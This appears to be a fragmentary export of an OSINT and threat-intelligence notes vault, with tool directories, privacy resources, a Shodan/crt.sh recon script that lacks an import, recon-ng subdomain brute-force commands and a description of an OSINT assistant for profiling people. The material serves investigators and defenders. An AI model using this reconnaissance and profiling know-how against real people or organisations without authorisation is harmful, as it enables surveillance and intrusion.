Forma parte de la estructura de threat-actor-search en el cheatsheet CTI-OSINT Importado desde Inbox/Proveedores de Inteligencia.md durante consolidacion bulk. Nota indice que organiza los proveedores de inteligencia de amenazas en tres categorias: blogs de investigacion de amenazas, informes de vendors CTI y repositorios de reportes. Sirve como punto de acceso a las fuentes primarias de reporting CTI. Tres categorias complementarias de fuentes de inteligencia Los blogs proporcionan analisis en tiempo real de amenazas emergentes Los repositorios agregan reportes historicos para investigacion retrospectiva Los informes de vendors ofrecen inteligencia curada y contextualizada Consultar blogs para seguimiento diario de amenazas Usar repositorios para investigacion historica de campañas Cruzar fuentes de multiples proveedores para validar inteligencia
threat-actor-search - Indice padre de recursos de threat actors
cti-osint-cheatsheet - Estructura principal del cheatsheet Importado desde Inbox/Repositorio de Amenazas.md durante consolidacion bulk. Directorio de 9 plataformas de threat intelligence para busqueda, enrichment y analisis de amenazas. Cubre desde motores multiescaner (VirusTotal) hasta plataformas especializadas de inteligencia de red (Greynoise, Binary Edge, Criminal IP).Plataformas de threat intelligence: busqueda, enrichment y analisis de amenazas. Busqueda y enrichment de IOCs durante investigacion de incidentes Analisis de reputacion de IPs, dominios y hashes sospechosos Identificacion de escaneo dirigido vs ruido de internet (Greynoise) Mapeo de superficie de ataque externa (Binary Edge, Criminal IP) Verificacion cruzada de indicadores entre multiples plataformas VirusTotal y OTX son las plataformas mas versatiles para uso general Greynoise aporta contexto unico al distinguir entre escaneo masivo y actividad dirigida Criminal IP y Binary Edge son utiles para evaluacion de superficie de ataque
Complementar con threat-actor-search para analisis dinamico de muestras Importado desde Inbox/Repositorios de Informes.md durante consolidacion bulk. Directorio de 3 repositorios principales para acceder a informes de amenazas y ransomware. Incluye una base de datos buscable de reportes CTI, una coleccion curada de reportes de ransomware en GitHub y el archivo de VX-Underground.Repositorios de reportes: bases de datos, colecciones curadas, archivos de investigacion. Buscar reportes historicos sobre un threat actor o campana especifica Investigar evolución de familias de ransomware a traves de reportes Acceder a analisis tecnicos detallados de malware Recopilar fuentes para informes de inteligencia estrategica ORKL es la herramienta mas eficiente para busqueda de reportes por keywords La coleccion GitHub de d4rk-d4nph3 se enfoca exclusivamente en ransomware VX-Underground combina reportes con muestras de malware para analisis completo
Forma parte de la estructura de threat-intelligence-feeds
tema-ransomware-actores-y-respuesta ]]>projects/cti/threat-intelligence-feeds.htmlProjects/cti/threat-intelligence-feeds.mdTue, 28 Apr 2026 14:29:14 GMTtema-report-writing-cti ]]>projects/doctrina/cti-osint-cheatsheet.htmlProjects/doctrina/cti-osint-cheatsheet.mdTue, 28 Apr 2026 14:29:14 GMThttps://github.com/EFForg/rayhunter Detects suspicious control plane events in real-time Does NOT intercept user traffic (web requests, etc.) Outputs PCAP format for forensic analysis Installation only supported on Mac/Linux (not Windows) Community-driven data collection approach to map CSS usage globally
Source: EFF Deeplinks - Meet Rayhunter
GitHub: EFForg/rayhunter
Hardware: Orbic RC400L (Amazon, Ebay) Authors: Cooper Quintin, Will Greenberg (EFF)
Background: EFF Street Level Surveillance, CSS explainer, CSS whitepaper
tema-opsec-completo-analista ]]>projects/opsec/rayhunter-cellular-spying-detection.htmlProjects/opsec/rayhunter-cellular-spying-detection.mdTue, 28 Apr 2026 14:29:14 GMTtema-opsec-completo-analista ]]>projects/opsec/plan-ejercicio-vishing.htmlProjects/opsec/plan-ejercicio-vishing.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Abine
Adium
Bitwarden - Open-source password manager with cross-platform support.
boxcryptor
CCleaner
Chatsecure
Disconnect
Do Not Track
Duck Duck Go Search Engine
EncSF MP
Epic Privacy Browser
Eraser
FileVault
Ghostery
GNU PG
GPG Tools
Guardian Project
Guerrilla Mail
Hotspot Shield
HTTPs Everywhere
I2P
justdeleteme
KeePass Password Safe - is a free and open-source password manager that uses the most secure encryption algorithms to safegard your passwords.
Lastpass
Lockbin
Mailbox
Mailvelope
Master Password
Nixory
NoScript
Open DNS
Open PGP
Oscobo Search Engine
OSSEC
Panopticlick
Peerblock
Pidgin
Pixel Block
Privacy.com - Virtual payment cards for online privacy and security.
Privacy Badger
Privazer
Proton Mail
Qubes - a security-focused desktop operating system that aims to provide security through isolation.
Script Safe
Securesha
Silent circle
Signal - End-to-end encrypted messaging and calls.
Snort
Spideroak
Steganography Online Codec
Surveilliance Self Defense
Tails
Thunderbird
Tor Project
uBlock Origin
Wickr
WOT
ZMail Importado desde Inbox/Cumplimiento de Privacidad.md durante consolidacion bulk. Plataformas open source para escaneo y cumplimiento de privacidad en entornos empresariales y multi-cloud. Utiles para auditorias de compliance y evaluacion de postura de seguridad.Compliance / Privacidad / Herramientas de escaneo. Auditorias de cumplimiento de privacidad en entornos cloud Evaluacion de postura de seguridad multi-cloud Compliance empresarial automatizado RiskScanner utiliza Cloud Custodian para definir reglas de escaneo Bombus esta orientado a entornos empresariales grandes Ambas herramientas son open source
tema-opsec-completo-analista ]]>projects/opsec/privacy-encryption-tools.htmlProjects/opsec/privacy-encryption-tools.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia. Search engines that focuses on anonymization,privacy.
DuckDuckGo - an Internet search engine that emphasizes protecting searchers' privacy.
Disconnect Search - Stop search engines from tracking your searches.
Gibiru - Gibiru provides “uncensored search results” without collecting personal data like logging users’ IP addresses or search queries.
Kagi Search - Liberate your search. Free of ads. Free of surveillance. Your time respected. You are the customer, never the product.
Mojeek - Mojeek is a growing independent search engine which does not track you.
Presearch - Presearch is a decentralized, community-driven search engine that protects your privacy and rewards you when you search.
Qwant - The search engine that respects your privacy.
Startpage - The world’s most private search engine.
SearXNG - A privacy-respecting, open-source metasearch engine.
swisscows - Anonymous search engine, a family-friendly, privacy-focused search engine based in Switzerland.
tema-opsec-completo-analista ]]>projects/opsec/privacy-search-engines.htmlProjects/opsec/privacy-search-engines.mdTue, 28 Apr 2026 14:29:14 GMThttps://ollama.com) Frameworks: transformers (Hugging Face), torch (PyTorch) Concepto de arquitectura multicapa para maximizar cobertura con resiliencia
tema-opsec-completo-analista ]]>projects/opsec/sistema-anonimizacion-texto.htmlProjects/opsec/sistema-anonimizacion-texto.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
OffShore.cat - list of vpns for the privacy conscious
TorrentFreak List of VPNs
VPN Comparison by That One Privacy Guy - is a summary list of top best VPN services.
tema-opsec-completo-analista ]]>projects/opsec/vpn-services.htmlProjects/opsec/vpn-services.mdTue, 28 Apr 2026 14:29:14 GMTtema-opsec-completo-analista ]]>projects/opsec/waffled-bypass-castellano.htmlProjects/opsec/waffled-bypass-castellano.mdTue, 28 Apr 2026 14:29:14 GMTosint-mastery-tools — Tool Categories, AI-Powered OSINT Tools, Repository Statistics.
osint-mastery-learning — Quick Start Guide, Documentation/Learning Resources, Future Development.In today's data-driven world, Open-Source Intelligence (OSINT) has become an essential skill for cybersecurity professionals, investigators, journalists, researchers, and business analysts. This repository provides a comprehensive collection of professional-grade templates and cutting-edge tools designed to streamline your OSINT operations and enhance your investigative capabilities.
Standardize OSINT Reporting: Professional templates for consistent, court-ready documentation Accelerate Investigations: Ready-to-use tools and methodologies to reduce analysis time Ensure Best Practices: Ethical guidelines and legal compliance frameworks Foster Community Learning: Open-source collaboration for continuous improvement Bridge Theory to Practice: Practical implementation of academic OSINT principles Our repository is meticulously organized to provide maximum usability and learning efficiency. Each directory corresponds to specific book chapters and investigation categories.📦 osint-mastery-guide/ ├── 📄 README.md # This comprehensive guide ├── 📄 LICENSE # MIT License terms ├── 📄 CONTRIBUTING.md # Contribution guidelines ├── 📄 CODE_OF_CONDUCT.md # Community standards ├── 📄 CHANGELOG.md # Version history ├── 📄 SECURITY.md # Security policy ├── ├── 📁 osint-templates/ # Professional OSINT Templates │ ├── 📄 README.md # Templates documentation │ ├── 📁 investigation-reports/ # Investigation report templates │ │ ├── 📄 person-investigation-report.md │ │ ├── 📄 business-intelligence-report.md │ │ ├── 📄 social-media-analysis-report.md │ │ ├── 📄 digital-footprint-assessment.md │ │ ├── 📄 asset-investigation-report.md │ │ ├── 📄 threat-intelligence-report.md │ │ ├── 📄 breach-analysis-report.md │ │ └── 📄 comprehensive-background-check.md │ ├── 📁 technical-assessments/ # Technical analysis templates │ │ ├── 📄 network-reconnaissance-report.md │ │ ├── 📄 domain-website-analysis-report.md │ │ ├── 📄 infrastructure-assessment.md │ │ ├── 📄 vulnerability-intelligence-report.md │ │ ├── 📄 malware-analysis-report.md │ │ └── 📄 incident-response-template.md │ ├── 📁 operational-planning/ # Planning and methodology templates │ │ ├── 📄 osint-collection-plan.md │ │ ├── 📄 investigation-workflow.md │ │ ├── 📄 risk-assessment-matrix.md │ │ ├── 📄 legal-compliance-checklist.md │ │ ├── 📄 source-verification-framework.md │ │ └── 📄 evidence-chain-custody.md │ ├── 📁 specialized-formats/ # Specialized investigation templates │ │ ├── 📄 court-ready-report.md │ │ ├── 📄 executive-summary.md │ │ ├── 📄 regulatory-compliance-report.md │ │ ├── 📄 insurance-investigation.md │ │ ├── 📄 academic-research-template.md │ │ └── 📄 journalism-fact-check.md │ └── 📁 ai-assisted-templates/ # AI-enhanced investigation templates │ ├── 📄 ai-pattern-analysis.md │ ├── 📄 automated-data-correlation.md │ ├── 📄 sentiment-analysis-report.md │ ├── 📄 predictive-intelligence.md │ └── 📄 machine-learning-insights.md ├── ├── 📁 osint-tools/ # Modern OSINT Tools & Technologies │ ├── 📄 README.md # Tools documentation │ ├── 📁 search-and-discovery/ # Search engines and discovery tools │ │ ├── 📁 advanced-search-engines/ │ │ ├── 📁 specialized-databases/ │ │ ├── 📁 academic-resources/ │ │ └── 📁 government-databases/ │ ├── 📁 social-media-intelligence/ # Social media analysis tools │ │ ├── 📁 platform-specific-tools/ │ │ ├── 📁 cross-platform-analyzers/ │ │ ├── 📁 sentiment-analysis/ │ │ └── 📁 network-mapping/ │ ├── 📁 technical-reconnaissance/ # Technical analysis tools │ │ ├── 📁 domain-analysis/ │ │ ├── 📁 network-scanning/ │ │ ├── 📁 certificate-analysis/ │ │ └── 📁 infrastructure-mapping/ │ ├── 📁 people-investigation/ # Person-focused investigation tools │ │ ├── 📁 identity-verification/ │ │ ├── 📁 background-checking/ │ │ ├── 📁 contact-discovery/ │ │ └── 📁 relationship-mapping/ │ ├── 📁 business-intelligence/ # Corporate investigation tools │ │ ├── 📁 company-research/ │ │ ├── 📁 financial-analysis/ │ │ ├── 📁 regulatory-monitoring/ │ │ └── 📁 competitive-intelligence/ │ ├── 📁 geospatial-intelligence/ # Location-based analysis tools │ │ ├── 📁 mapping-platforms/ │ │ ├── 📁 satellite-imagery/ │ │ ├── 📁 location-tracking/ │ │ └── 📁 geographic-correlation/ │ ├── 📁 ai-powered-tools/ # Artificial Intelligence OSINT tools │ │ ├── 📁 machine-learning/ │ │ ├── 📁 natural-language-processing/ │ │ ├── 📁 image-recognition/ │ │ ├── 📁 pattern-analysis/ │ │ └── 📁 automated-reporting/ │ ├── 📁 data-visualization/ # Analysis and presentation tools │ │ ├── 📁 link-analysis/ │ │ ├── 📁 timeline-creation/ │ │ ├── 📁 network-diagrams/ │ │ └── 📁 interactive-dashboards/ │ ├── 📁 privacy-and-security/ # Privacy protection and security tools │ │ ├── 📁 anonymization-tools/ │ │ ├── 📁 vpn-tor-setup/ │ │ ├── 📁 secure-communications/ │ │ └── 📁 operational-security/ │ └── 📁 mobile-and-iot/ # Mobile device and IoT investigation │ ├── 📁 mobile-forensics/ │ ├── 📁 app-analysis/ │ ├── 📁 iot-discovery/ │ └── 📁 wireless-intelligence/ ├── ├── 📁 documentation/ # Additional documentation and guides │ ├── 📁 getting-started/ # Beginner guides and tutorials │ ├── 📁 advanced-techniques/ # Expert-level methodologies │ ├── 📁 legal-and-ethics/ # Legal compliance and ethical guidelines │ ├── 📁 case-studies/ # Real-world application examples │ ├── 📁 training-materials/ # Educational resources and exercises │ └── 📁 reference-guides/ # Quick reference cards and checklists ├── ├── 📁 scripts-and-automation/ # Automation scripts and utilities │ ├── 📁 python-scripts/ # Python automation tools │ ├── 📁 bash-utilities/ # Shell scripts and utilities │ ├── 📁 api-integrations/ # API connection scripts │ └── 📁 data-processing/ # Data analysis and processing tools ├── └── 📁 community/ # Community resources ├── 📁 contributions/ # Community-contributed content ├── 📁 discussions/ # Discussion topics and Q&A ├── 📁 events/ # Workshops, webinars, and conferences └── 📁 resources/ # Additional learning resources Protecting yourself during OSINT investigations: 🌐 Network Security: VPN usage, Tor networks, secure connections 💻 System Security: Isolated investigation environments, secure operating systems 📱 Communication Security: Encrypted messaging, secure email, anonymous communications 🗄️ Data Protection: Encrypted storage, secure backup procedures, data retention policies Protecting investigation integrity and sources: 🤐 Source Protection: Anonymizing sources and protecting informants 📊 Data Integrity: Maintaining chain of custody and evidence integrity 🔒 Access Control: Limiting access to sensitive investigation materials 📝 Documentation Security: Secure storage and transmission of reports
tema-osint-references-master-deep-dive ]]>projects/osint-references/osint-mastery-guide.htmlProjects/osint-references/osint-mastery-guide.mdTue, 28 Apr 2026 14:29:14 GMT<figure><img src="https://github.com/JambaAcademy/OSINT/blob/main/Bok-mockup.jpg"></figure>fundamentos-osint B — 1. Fundamentals
legal-considerations-osint B — 11. Legal Considerations
metodologia-4-pasos-osint B — 2. 4-Step Methodology
osint-learning-resources B — 30. Learning Resources
professional-methodologies B — 28. Professional Methodologies
data-breach-search-engines A+B
live-cyber-threat-maps A
pastebins A
report-templates-bible B — 10. Report Templates
threat-actor-search A
threat-intelligence-feeds A — Threat Intelligence
blog-search A
forums-discussion-boards A — Forums and Discussion Boards Search
major-social-networks A+B
real-time-social-search A — Real-Time Search, Social Media Search, and General Social Media Tools
social-media-tools A
social-network-analysis A
username-enumeration A+B — Username Check
company-research A+B
email-investigation A+B — Email Search / Email Check
expert-search A
job-search-resources A
people-investigations A+B
phone-research A — Phone Number Research
qa-sites A — Q&A Sites
vehicle-research A — Vehicle / Automobile Research
browsers-osint A — Browsers
dns-tools A — DNS
domain-ip-research A+B — Domain and IP Research
metadata-extraction B — 23. Metadata Extraction
network-scanning B — 24. Network Scanning
offline-browsing A
transport-osint B — 18. Transport OSINT
web-history-capture A — Web History and Website Capture
web-scraping B — 22. Web Scraping
wifi-wardriving B — 19. WiFi/Wardriving
facial-recognition B — 14. Facial Recognition
geospatial-mapping A — Geospatial Research and Mapping Tools
image-analysis A
image-search A+B
maritime-osint A — Maritime
video-tools A — Video Search and Other Video Tools
visual-search-clustering A — Visual Search and Clustering Search Engines
blockchain-crypto-investigation B — 17. Blockchain/Crypto
academic-resources A — Academic Resources and Grey Literature
ai-intelligence-osint B — 13. AI Intelligence
all-in-one-frameworks B — 26. All-in-One Frameworks
automation-python-osint B — 9. Automation (Python)
code-search A
dark-web-search-engines A+B
data-statistics A — Data and Statistics
deep-dark-web-bible B — 8. Deep & Dark Web
document-slides-search A — Document and Slides Search
extra-osint-resources B — 12. Extra Resources
fact-checking A
file-search A
general-search-engines A — General Search
google-dorks-tools A+B
infographics-visualization A — Infographics and Data Visualization
internet-search-bible B — 4. Internet Search
keywords-discovery A — Keywords Discovery and Research
language-tools A
maltego-advanced B — 27. Advanced Maltego
meta-search-engines A — Meta Search
national-search-engines A — Main National Search Engines
news-digest-discovery A — News Digest and Discovery Tools
news-osint A — News
other-osint-tools A — Other Tools
similar-sites-search A
speciality-search-engines A
tools-mind-map B — 3. Tools Mind Map
web-monitoring A
privacy-encryption-tools A — Privacy and Encryption Tools
privacy-search-engines A — Privacy Focused Search Engines
vpn-services A
content-verification B — 20. Content Verification
gaming-platforms A
music-streaming-services A
osint-blogs A
osint-videos A
other-osint-resources A — Other Resources
related-awesome-lists A
osint-mastery-guide — Master de OSINT Mastery (Jamba Academy). Se mantiene separado porque conserva contenido del repo Jamba (architecture, templates, legal, privacy) que no esta en atomicas.
osint-mastery-tools, osint-mastery-learning — sub-notas activas de mastery.
Awesome OSINT (jivoi) — MIT — https://github.com/jivoi/awesome-osint OSINT Bible — ver upstream. Importado desde Inbox/Recursos OSINT.md durante consolidacion bulk. Indice maestro que enlaza todos los catalogos tematicos de herramientas OSINT del vault. Punto de entrada para navegar entre las diferentes categorias de recursos disponibles.Indice / Mapa de recursos / Navegacion del vault.
social-media-tools
social-media-tools
social-media-tools
social-media-tools
social-media-tools
social-media-tools
username-enumeration
social-media-tools
people-investigations
people-investigations
phone-research
email-investigation
company-research
social-media-tools
vehicle-research
web-history-capture
web-history-capture
meta-search-engines
geospatial-mapping
image-search
metadata-extraction
android-osint-mobile
all-in-one-frameworks PRODUCTIVIDAD
browsers-osint
other-osint-tools
data-breach-search-engines
data-breach-search-engines
people-investigations ARTICULOS DE INTERÉS Este indice enlaza a los catalogos principales; cada catalogo contiene sus propias herramientas
Ver all-in-one-frameworks para frameworks integrales que agrupan multiples herramientas Ver readme para la documentacion completa del vault OSINT original
tema-osint-references-master-deep-dive ]]>projects/osint-references/osint-references-master.htmlProjects/osint-references/osint-references-master.mdTue, 28 Apr 2026 14:29:14 GMTOSINT360 ⌁ Cyber Intelligence is a specialized GPT-5.2-powered assistant designed for open-source intelligence (OSINT), digital forensics (DFIR), cyber investigations, ethical hacking, and operational security (OPSEC). It provides end-to-end support for intelligence operations, from collection and analysis to reporting and adversary profiling.This GPT instance is optimized for: OSINT collection & enrichment (domains, IPs, usernames, social media, dark web) DFIR workflows (forensic triage, malware analysis, chain of custody) Cybercrime investigations (threat actor profiling, campaign mapping, crypto tracing) Red/Blue/Purple Teaming (adversary emulation, detection engineering, threat hunting) OPSEC & Privacy (anonymization, persona building, de-anonymization defense) Compliance (GDPR, AI Act, global cyber laws) Command-based interaction for fast execution of playbooks, reports, and checklists. Structured outputs: every report follows Executive Summary → Key Findings → Evidence → Analysis → Risks → Recommendations → Next Steps. Tool-first approach: always suggests open-source GitHub tools before commercial alternatives. Up-to-date intelligence: integrates live web lookups when fresh data is required. Chain of custody compliance: hashes, metadata preservation, evidence integrity. Framework alignment: MITRE ATT&CK, Diamond Model, Cyber Kill Chain. /help → Show full command reference. /new → Start a new case (expanded subcategories by domain: OSINT, DFIR, Red Team, etc.). /report [entity] → Full-spectrum OSINT/cyber report. /profile [entity] → Dossier profile (person, org, asset). /timeline [entity] → Exposure/events timeline. /enrich [IOC|entity] → Enrich IP, domain, email, hash, wallet. /metadata [file|image] → Extract metadata/EXIF. /deepresearch [keyword] → In-depth research across OSINT, dark web, SIGINT, HUMINT. /mitre [actor|incident] → ATT&CK mapping of TTPs. /iocs [campaign] → IOC tables (CSV/Markdown/STIX). /actor [name] → Threat actor profile. /campaign [name] → Campaign infrastructure mapping. /infrastructure [org] → Org’s exposed infrastructure map. /playbook [scenario] → IR/Red/Blue playbooks. /template [scenario] → Full investigation template. /checklist [scenario] → Step-by-step task checklist. Markdown / HTML (default) CSV / JSON (for IOCs & structured data) STIX 2.1 (optional export for threat intel platforms) Mermaid diagrams (infra/timeline visualization) OSINT360 GPT adheres to strict OPSEC, legality, and evidentiary integrity principles: Avoids disclosure of confidential sources. Prioritizes privacy and anonymization methods. Ensures all recommendations are ethical and legal. /report threatintel.com # Generate a full-spectrum OSINT report on a domain /enrich 192.168.100.45 # Enrich and investigate an IP address (infrastructure asset) /profile Microsoft Corporation # Build a detailed profile of a company or organization /metadata breach_dump.jpg # Extract EXIF/metadata from an uploaded file or image /deepresearch "phishing kits" # Deep dive into phishing kit research /mitre Lazarus Group # Map an APT group’s TTPs to MITRE ATT&CK /checklist Digital Forensics # Get a structured task checklist for DFIR workflows /report john_doe # Full OSINT report on an individual /enrich jane.doe@example.com # Enrich and investigate an email address /profile @randomuser123 # Social media persona profiling /metadata leaked_doc.pdf # Extract metadata and analyze embedded artifacts /actor Conti # Profile ransomware group /campaign SolarWinds # Map campaign infrastructure /infrastructure target_org # Map exposed infrastructure of a company /mitre Conti Ransomware # Map ransomware campaign TTPs to MITRE ATT&CK /playbook Incident Response # Get a full IR playbook for SOC teams /template OSINT Investigation # Generate OSINT investigation template /checklist Threat Hunting # Checklist for SOC and hunting teams
🔗 Launch OSINT360 GPT PS: Heads-up - on complex queries it may take a moment to chew through large datasets. Good intel takes time 😉 The model builds on best practices in OSINT, digital forensics, red teaming, privacy engineering, and cybersecurity strategy. It leverages frameworks and standards including MITRE ATT&CK, NIST, OWASP, OWASP GenAI, GDPR, and AI Act, with a focus on open-source tooling.This model is provided for educational, research, and defensive purposes only. It does not endorse or support any unlawful or malicious activity.
tema-osint-references-master-deep-dive ]]>projects/osint-references/osint360-gpt.htmlProjects/osint-references/osint360-gpt.mdTue, 28 Apr 2026 14:29:14 GMT<figure><img src="https://img.shields.io/badge/AI-GPT5-critical"></figure>osint-references-master.
tema-osint-toolchain-comparativa ]]>projects/osint-tools/tools-mind-map.htmlProjects/osint-tools/tools-mind-map.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master.
DuckDuckGo "bangs" → !archive
Yandex → best results CIS
Baidu → Asia
Startpage → no logs
Shodan → IoT, ICS, SCADA
Censys → cert + banner
FOFA → China, free API
ZoomEye → similar to Shodan
BinaryEdge → global scanning
Hunter.io → corporate emails
PublicWWW → search in source code
SearchCode → search in 75B lines of code
SimilarSites → similar sites
Netlas → internet intelligence
CriminalIP → search in connected internet
NerdyData → website technologies
GreyNoise → internet noise
Intezer Analyze → malware analysis
Kaspersky OpenTIP → threat scanning
VirusTotal → file/URL analysis
AlienVault OTX → threat exchange
ExploitDB → exploit database
MalwareBazaar → malware samples
Malware Domain List → malicious domains
PhishTank → phishing URLs
URLhaus → malware URLs
ThreatMiner → threat intelligence
YARAify → YARA rules
PulseDive → IOC search
ThreatFox → malware IOCs
Breach Directory → breach searches
Have I Been Pwned → breach verification
DNSViz → DNSSEC visualization
DNS Twister → similar domains
DNSdumpster → DNS enumeration
SpyOnWeb → related sites
Yark → archive YouTube
CovertAction → investigative journalism
Trellix Research → threat research
CP Research → Checkpoint research
Wikistrat → collaborative analysis
PolySwarm → threat scanning
HackerOne Hacktivity → public vulnerabilities
WikiLeaks → leaked documents
Talos Reports → vulnerability reports
MalAPI → malware APIs
UserSearch → user search
SecureList → Kaspersky blog
SPLC Hate Map → hate map
ICSR → radicalization studies
Militant Wire → militancy analysis
START Publications → terrorism publications
SPLC Resources → SPLC resources
Tracking Terrorism → terrorism tracking
Mapping Militants → mapping militants
Naval Institute → naval news
Institute of International Relations → international relations
Janes → defense intelligence
TASS News → Russian news
Sputnik News → Sputnik news
PIPS → Pakistan peace studies
PICSS → Pakistan conflict studies
Reuters → news agency
RT → Russia Today
InternetActivism → humanitarian tools
IISS → international studies institute
CFR → council on foreign relations
SciHub → access to scientific papers
ResearchHub → research discussion
IDCrawl → people search
Osint Industries → email/phone search
ESPY → phone search
SUNDERS → surveillance cameras
Privacy Watch → OSINT tools
Deepinfo → internet intelligence
Session → private messaging
Consortium News → independent journalism
Tutanota → encrypted email
Committee to Protect Journalists → journalist protection
SecurityWeek → security news
NCRI → network contagion research
Geopolitical Economy Report → geopolitical reports
The Grayzone → independent journalism
The Moscow Times → Russian news
FlightAware → flight tracking
FlightRadar24 → flight radar
MarineTraffic → maritime traffic
VesselFinder → ship search
NewspaperArchive → newspaper archives
The Indian Express → Indian news
Daily Excelsior → Jammu Kashmir news
DNA India → Indian news
Greater Kashmir → Kashmir news
Nagaland Post → Nagaland news
RFE/RL → Radio Free Europe
Akto → API security
Generated Photos → AI photos
Factinsect → AI fact-checking
HDRobots → AI tools directory
Channel 4 News → British news
ThreatMon Reports → threat reports
0t.rocks Search → people search
Israel Datasets → Israeli datasets
Simplex 3D → 3D maps Israel
AI Dubbing → AI dubbing
Budget Key → Israel budget
Ship Spotting → ship photos
Broadcastify → police audio
OpenCelliD → cell tower database
AviationStack → aviation API
DigitalSide TI → threat intelligence
DocumentCloud → document management
IDRW → Indian defense
XFE → X-Force exchange
Scumware → malware research
Ukraine Live Cams → Ukraine cameras
TWN → webcam network
Opentopia → public webcams
Transparency → anti-corruption
Maigret → user search
OCCRP → organized crime
Qdorks → dork generator
Radio Garden → world radios
LolArchiver OSINT → OSINT search
BreachBase → breach base
WorldCam → world webcams
Webcam Galore → webcams
WiFi Map → WiFi hotspots
OpenTrafficCamMap → traffic cameras
KrooozCams → cruise webcams
Skyline Webcams → skyline webcams
Pictimo → world webcams
Instances.social → Mastodon recommender
CamHacker → public webcams
Labs TIB Geoestimation → geographic estimation
Picarta → photo location prediction
Tiny Scan → URL scanning
ZeroDay → zero-day vulnerabilities
Predicta Search → digital search
Ventusky → weather maps
OSV → open source vulnerabilities
Certs → certificate information
Coalition ESS → exploit scoring
Validin → attack surface mapping
CastrickClues → OSINT search
CIRCL PDNS → passive DNS
InTheWild → exploits in wild
TheWebCo → people intelligence
360 Quake → cyberspace mapping
Cloudflare Radar → internet trends
Crisis24 → security risk management
arXiv → scientific papers
Wayback Machine
CachedView (Google + Archive.is)
URLScan → capture + DOM + requests
Ubikron → AI-powered evidence collection & entity extraction
Screenshot Guru → screen test
Stored Website → cached pages
ThreatMiner → IOC context
YARAify → YARA rules
PulseDive → IOC search
ThreatFox → malware IOCs
Breach Directory → breaches
Have I Been Pwned → breach verification
DNSViz → DNSSEC
DNS Twister → similar domains
DNSdumpster → DNS enumeration
SpyOnWeb → related sites
Yark → archive YouTube
tema-osint-toolchain-comparativa ]]>projects/osint-tools/internet-search-bible.htmlProjects/osint-tools/internet-search-bible.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. python -m venv osint-env source osint-env/bin/activate pip install twint-fork recon-ng selenium requests beautifulsoup4 shodan #!/usr/bin/env python3 # mini_osint.py import shodan, requests, json, sys from bs4 import BeautifulSoup API_KEY = 'YOUR_SHODAN_API' s = shodan.Shodan(API_KEY) domain = sys.argv[1] # 1. Subdomains via CRT.sh crt = requests.get(f'https://crt.sh/?q=%25.{domain}&output=json').json() subs = sorted(set([r['name_value'] for r in crt])) print('[+] Found subdomains:', len(subs)) # 2. IPs from resolution ips = set() for sub in subs[:20]: # demo limit try: ips.add(socket.gethostbyname(sub)) except: pass # 3. Shodan quick look for ip in ips: try: info = s.host(ip) print(ip, info['org'], info.get('vulns', 'N/A')) except: pass recon-ng > marketplace install all > workspaces add target > use domains-domains/brute_force > set SOURCE target.com > run > use hosts-hosts/resolve > run > use reporting/csv > run
tema-osint-toolchain-comparativa ]]>projects/osint-tools/automation-python-osint.htmlProjects/osint-tools/automation-python-osint.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master.
Open Source Intelligence – CNI Spain (PDF)
OSINT-Field-Manual – US Army
SEINT (SANS 487)
OSINT-Do-jo – daily challenges
Michel Bacchus – YouTube OSINT in Spanish
Telegram: OSINT Latam
Discord: OSINT Español
Reddit: r/OSINT
tema-osint-toolchain-comparativa ]]>projects/osint-tools/extra-osint-resources.htmlProjects/osint-tools/extra-osint-resources.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. AI-powered tools for OSINT 2025:
tema-osint-toolchain-comparativa ]]>projects/osint-tools/ai-intelligence-osint.htmlProjects/osint-tools/ai-intelligence-osint.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. All-in-one platforms:SpiderFoot setup:git clone https://github.com/smicallef/spiderfoot.git cd spiderfoot pip3 install -r requirements.txt python3 sf.py -l 127.0.0.1:5001 # Open http://localhost:5001 Importado desde Inbox/SUITES.md. Frameworks y plataformas que agrupan multiples herramientas OSINT en una sola interfaz. Ideales como punto de partida para investigaciones o para descubrir herramientas nuevas organizadas por categoria.Frameworks OSINT / Plataformas integrales / Indices de herramientas. Punto de partida para investigaciones cuando no se conoce la herramienta adecuada Descubrir herramientas nuevas organizadas por tipo de dato Intelligence X como buscador de datos historicos y filtraciones Referencia rapida para seleccionar la herramienta correcta OSINT Framework es la referencia clasica del sector Intelligence X incluye busqueda en filtraciones, darknet y archive historico Ciberpatrulla es el mejor recurso en espanol
Ver osint-references-master para el indice completo de herramientas del vault
tema-osint-toolchain-comparativa ]]>projects/osint-tools/all-in-one-frameworks.htmlProjects/osint-tools/all-in-one-frameworks.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Essential plugins:Create custom transform:# my_transform.py from maltego_trx.entities import Person, EmailAddress from maltego_trx.transform import DiscoverableTransform class PersonToEmail(DiscoverableTransform): @classmethod def create_entities(cls, request, response): person_name = request.Value # Your logic here response.addEntity(EmailAddress, f"{person_name}@example.com") return response
tema-osint-toolchain-comparativa ]]>projects/osint-tools/maltego-advanced.htmlProjects/osint-tools/maltego-advanced.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Academia
Academic Journals
African Journal Online - is the world's largest and preeminent platform of African-published scholarly journals
American Society of Civil Engineers
Base
Bibsonomy
Core
Elsevier
Google Scholar
Grey Guide
Grey Literature Strategies
Grey Literature – List of Gateways
GreyNet International
HighWire: Free Online Full-text Articles
Journal Guide
Journal Seek
JSTOR - Search over 10 million academic journal articles, books, and primary sources.
Lazy Scholar
Leibniz Information Centre For Science and Technology University Library - indexes all reports of German publicly funded projects and many scientific papers.
Microsoft Academic
NRC Research Press
OA.mg A database of over 240 million scientific works, with PDFs for all Open Access papers in their catalogue (~ 40 million)
Open Access Scientific Journals
Open Grey
Oxford Journals
PubMed - Search more than 27 millions citations for biomedical literature from MEDLINE, life science journals, and online books.
Quetzal Search
Research Gate
SAGE Journals
Science Publications
ScienceDirect
ScienceDomain
SCIRP
Springer
Taylor & Francis Online
The Open Syllabus Project
Wiley
World Digital Library
World Science
Zetoc
